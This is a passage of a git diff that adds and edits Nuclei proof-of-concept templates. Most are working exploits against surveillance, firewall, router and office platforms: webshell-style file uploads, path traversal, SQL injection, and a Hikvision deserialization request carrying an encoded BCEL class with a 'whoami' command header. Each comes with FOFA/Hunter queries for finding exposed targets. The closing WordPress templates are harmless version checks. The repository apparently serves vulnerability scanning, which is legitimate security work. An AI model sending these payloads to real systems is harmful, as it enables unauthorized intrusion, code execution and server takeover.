OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml @@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index 1cd783867f..a8f9cbe173 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,28 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + --4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "nologin" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml index f2db119795..fa762ac2f6 100644 --- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml +++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml @@ -1,33 +1,37 @@ id: Ruijie info: - name: Ruijie Switch WEB Management System EXCU_ SHELL + name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie Switch WEB Management System EXCU_ SHELL + Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges metadata: - fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" - hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" + fofa-query: app="Ruijie-NBR路由器" + hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" http: - raw: - | - GET /EXCU_SHELL HTTP/1.1 + POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Cmdnum: '1' - Command1: show running-config - Confirm1: n + Accept: text/plain, */*; q=0.01 + Content-Disposition: form-data; name="file"; filename="111.php" + Content-Type: image/jpeg + + - | + GET /321/test.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "configuration")' + - 'status_code_2 == 200' + - 'contains(body_1, "test.php")' + - 'contains(body_2, "PHP Version")' condition: and diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 8c93d2bd55..aa02a4941d 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml @@ -1,39 +1,52 @@ id: FanWei info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream - + + ------WebKitFormBoundaryakbyiukl-- - --e64bdf16c554bbc109cecef6451c26a4-- + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' - condition: and - -# /attachment/3466744850/xxx.php + - body_2 == str2 + +# http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/wordpress/leopard-wordpress-offload-media.yaml b/poc/wordpress/leopard-wordpress-offload-media.yaml new file mode 100644 index 0000000000..bc3b3821d7 --- /dev/null +++ b/poc/wordpress/leopard-wordpress-offload-media.yaml @@ -0,0 +1,59 @@ +id: leopard-wordpress-offload-media + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/wordpress/wp-travel-blocks.yaml b/poc/wordpress/wp-travel-blocks.yaml new file mode 100644 index 0000000000..0addc83668 --- /dev/null +++ b/poc/wordpress/wp-travel-blocks.yaml @@ -0,0 +1,59 @@ +id: wp-travel-blocks + +info: + name: > + WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-travel-blocks/" + google-query: inurl:"/wp-content/plugins/wp-travel-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-travel-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-travel-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/wordpress/wptelegram-widget.yaml b/poc/wordpress/wptelegram-widget.yaml new file mode 100644 index 0000000000..48f2ae9337 --- /dev/null +++ b/poc/wordpress/wptelegram-widget.yaml @@ -0,0 +1,59 @@ +id: wptelegram-widget + +info: + name: > + WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wptelegram-widget/" + google-query: inurl:"/wp-content/plugins/wptelegram-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wptelegram-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wptelegram-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.27') \ No newline at end of file